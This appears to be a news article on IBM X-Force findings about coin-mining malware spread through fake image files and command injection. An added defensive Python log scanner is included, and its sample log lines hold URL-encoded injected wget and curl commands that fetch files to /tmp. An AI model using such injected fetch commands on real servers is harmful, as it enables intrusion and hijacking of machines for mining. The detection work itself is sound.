With the growing success and profitability of cryptocurrency, criminals have also started to focus their efforts on abusing the largely untraceable currency. If the last two years are any indication, cybercriminals have attempted to attack both sides of the financial world; however, thanks to the inherent privacy that cryptocurrency offers, it is becoming the center of the latest campaigns.
While we reported a number of attacks that focused on cryptocurrency (mostly Ethereum in this wave) earlier this summer, attackers aren’t only looking at emptying out online wallets. They are also focusing their efforts on recruiting machines for mining. A latest research report from IBM X-Force that the team shared with Wccftech ahead of its publication reveals that there has been a “steep increase” in the number of mining tools used in cyberattacks. Malware containing cryptocurrency coin-mining tools has evidently started to focus more on enterprise networks and CPU mining.
“According to IBM Managed Security Services (MSS) data, there have been peaks reaching more than a sixfold increase in attacks involving embedded mining tools in the eight-month period between January and August 2018.”
This follows an earlier report by security researchers at GuardiCore, who had revealed that a botnet made up of compromised Windows Server machines was being used for ransomware, data exfiltration, and mining Monero cryptocurrency.
One coin miner tool to rule all the cryptocurrencies?
In the latest research, IBM X-Force said that they spotted the same mining tool, capable of mining several different coins, being used by attackers. Hidden within fake image files, hosted on compromised web servers running Joomla or WordPress, or stored on compromised JBoss Application Servers, the attackers attempted to mine several different currencies, including Monero (XMR).
The victim – mostly from a set of targeted industries – would need to visit the compromised page for the attack to be launched. They could also be attacked using malicious email attachments or links.
“Command injection (CMDi) attacks, detected by IBM Security’s managed intrusion detection and prevention system (IDPS) service during the attacks, were attempting to plant the malicious images on victims’ machines using WGET and CURL shell commands when victims simply visited the page via a link in an email or through visiting a compromised webpage,” the security researchers wrote.
IBM researchers noted two possible scenarios of how the attack was launched:
- The attackers scanned for already compromised CMS and then conducted the CMDi (command injection) attack.
- Cybercriminals performed both the initial compromise of the web resource and the subsequent CMDi attack.
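As a defensive illustration of the CMDi pattern the researchers describe (a wget or curl command injected into a request to pull down an "image"), the following added example scans web access logs for it. It is not code from IBM or Wccftech; it assumes Apache/nginx combined log format with the payload in the request URL, and the log lines, addresses and domains are constructed.

```python
import re
from urllib.parse import unquote_plus

# Combined-log-format prefix: client, request method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# A shell separator, then wget/curl, then an http(s) URL ending in an image
# extension: the "download a fake image" pattern described in the article.
FETCH_RE = re.compile(
    r"(?:;|\||&|`|\$\(|\n)\s*(wget|curl)\s+[^;|&`\n]*?"
    r"(https?://[^\s;|&`'\"]+\.(?:jpe?g|png|gif|bmp))\b",
    re.IGNORECASE,
)

def decode(value, rounds=2):
    """URL-decode up to `rounds` times so double-encoded payloads are seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_cmdi_fetches(log_lines):
    """Return one finding per request whose target carries an injected fetch."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        client, _method, target, status = m.groups()
        hit = FETCH_RE.search(decode(target))
        if hit:
            findings.append({"client": client, "tool": hit.group(1).lower(),
                             "url": hit.group(2), "status": int(status)})
    return findings

# Constructed sample lines (documentation IP ranges, example domains).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2018:10:00:00 +0000] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2018:10:00:05 +0000] "GET /index.php?page=1%3Bwget%20http%3A%2F%2Ffiles.example.net%2Flogo.jpg%20-O%20%2Ftmp%2Fa HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2018:10:00:09 +0000] "GET /wp-content/x.php?c=a%257Ccurl%2520-s%2520https%253A%252F%252Ffiles.example.net%252Fpic.png HTTP/1.1" 500 0',
    '192.0.2.44 - - [01/Jan/2018:10:01:00 +0000] "GET /docs/curl-tutorial.html?img=http://cdn.example.com/a.png HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in find_cmdi_fetches(SAMPLE_LOG):
        print(finding)
```

The status code in each finding helps triage: a 200 on an injected request deserves a closer look at the host than a 4xx/5xx, and the fetched URL is worth checking against proxy or egress logs.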
Focus on a few industries
While it is unclear why the attackers have focused on a few industries, the research reveals that manufacturing and financial services were the most targeted, followed by arts and entertainment, information and communication technology, and retail.
In an email to Wccftech, IBM’s security researchers noted that these “percentages indicate attacks on users in those industries, not necessarily the websites owned by those industries.” They added that “in this particular case, we’re measuring attempted attacks that could have been delivered by phishing emails, watering hole attacks, or simply visiting a compromised webpage that was previously trusted.”
Why CPU coin miner?
Cryptocurrency mining has affected both the pricing and availability of GPUs. While GPUs have large numbers of arithmetic logic units (ALUs) compared to CPUs, which permits them to do bulk mathematical work in greater quantity than CPUs, a GPU may not always be the best choice for an attacker.
Researchers believe that CPU mining gives attackers a larger playing field, with more endpoints to enslave, when compared to “optional” GPUs. “The CryptoNight mining algorithm employed by CryptoNote-based currency is designed for mining on CPUs and can be efficiently tasked to billions of existing devices (any modern x86 CPU),” the researchers added. They further said that a capability known as smart mining permits CPU mining on the user’s computer “without centralization of mining farms and pool mining.”
If you are wondering what currencies attackers are mining, the list includes mostly CryptoNote-based virtual currencies, including:
- ByteCoin (BCN)
- Boolberry (BBR)
- Dashcoin (DSH)
- DigitalNote (XDN)
- DarkNetCoin (DNC)
- Fantomcoin (FCN)
- Monero (XMR)
- Pebblecoin (XPB)
- Quazarcoin (QCN)
- Anonymous Electronic On-line Coin (AEON)
“Our findings did show the potential for Monero to be slightly more profitable than mining for the more popular bitcoin (BTC), for example, making it perhaps more attractive to attackers,” researchers noted. “This may be the reason for the jump in volume of attacks utilizing this type of mining tool.”